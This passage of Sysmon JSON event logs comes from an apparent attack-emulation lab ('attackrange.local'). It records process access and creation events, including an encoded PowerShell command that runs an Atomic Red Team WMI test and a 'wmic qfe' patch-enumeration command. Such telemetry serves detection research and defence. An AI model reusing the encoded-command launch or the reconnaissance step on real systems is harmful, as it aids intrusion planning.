07:59:14.143","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-20D2-5F25-0000-001085460800}","TargetProcessId":"4700","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5318,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.143\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-20D2-5F25-0000-001051470800}\r\nTargetProcessId: 3296\r\nTargetImage: C:\\Windows\\System32\\Wbem\\WMIC.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.143","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-20D2-5F25-0000-001051470800}","TargetProcessId":"3296","TargetImage":"C:\\Windows\\System32\\Wbem\\WMIC.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5319,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.171\r\nProcessGuid: {41C8662E-20D2-5F25-0000-0010544D0800}\r\nProcessId: 5096\r\nImage: C:\\Windows\\System32\\cmd.exe\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Windows Command Processor\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: Cmd.Exe\r\nCommandLine: \"C:\\Windows\\system32\\cmd.exe\" /c \"wmic qfe get description,installedOn /format:csv\" \r\nCurrentDirectory: C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-20CF-5F25-0000-00209EF40700}\r\nLogonId: 0x7F49E\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A\r\nParentProcessGuid: {41C8662E-20D0-5F25-0000-0010871B0800}\r\nParentProcessId: 2992\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADQANwAiACAALQBDAG8AbgBmAGkAcgBtADoAJABmAGEAbABzAGUAIAAtAFQAaQBtAGUAbwB1AHQAUwBlAGMAbwBuAGQAcwAgADMAMAAwACAALQBFAHgAZQBjAHUAdABpAG8AbgBMAG8AZwBQAGEAdABoACAAQwA6AFwAQQB0AG8AbQBpAGMAUgBlAGQAVABlAGEAbQBcAGEAdABjAF8AZQB4AGUAYwB1AHQAaQBvAG4ALgBjAHMAdgA=","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.171","ProcessGuid":"{41C8662E-20D2-5F25-0000-0010544D0800}","Image":"C:\\Windows\\System32\\cmd.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Windows Command Processor","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"Cmd.Exe","CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"wmic qfe get description,installedOn /format:csv\" ","CurrentDirectory":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-20CF-5F25-0000-00209EF40700}","LogonId":"0x7f49e","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A","ParentProcessGuid":"{41C8662E-20D0-5F25-0000-0010871B0800}","ParentProcessId":"2992","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADQANwAiACAALQBDAG8AbgBmAGkAcgBtADoAJABmAGEAbABzAGUAIAAtAFQAaQBtAGUAbwB1AHQAUwBlAGMAbwBuAGQAcwAgADMAMAAwACAALQBFAHgAZQBjAHUAdABpAG8AbgBMAG8AZwBQAGEAdABoACAAQwA6AFwAQQB0AG8AbQBpAGMAUgBlAGQAVABlAGEAbQBcAGEAdABjAF8AZQB4AGUAYwB1AHQAaQBvAG4ALgBjAHMAdgA=","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5320,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.158\r\nSourceProcessGUID: {41C8662E-20D0-5F25-0000-0010871B0800}\r\nSourceProcessId: 2992\r\nSourceThreadId: 5056\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {41C8662E-20D2-5F25-0000-0010544D0800}\r\nTargetProcessId: 5096\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663735cf(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66373443(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663f5c6f(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6636c02b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66e24fce(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66334823(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66392cf2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663761e8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6636816d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663a12fd(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.158","SourceProcessGUID":"{41C8662E-20D0-5F25-0000-0010871B0800}","SourceProcessId":"2992","SourceThreadId":"5056","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{41C8662E-20D2-5F25-0000-0010544D0800}","TargetProcessId":"5096","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Microsoft.Pae3498d9#\\68110cd890af5c762b58746b873e8fbb\\Microsoft.PowerShell.Commands.Management.ni.dll+7fffd(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663735cf(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66373443(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663f5c6f(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6636c02b(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66e24fce(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66334823(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66392cf2(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+66376357(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663761e8(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+6636816d(wow64)|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+663a12fd(wow64)","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5321,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.158\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2340\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20D2-5F25-0000-0010544D0800}\r\nTargetProcessId: 5096\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.158","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"2340","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20D2-5F25-0000-0010544D0800}","TargetProcessId":"5096","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5322,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.158\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:14.158","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:14","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:14","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5323,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:14.158\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 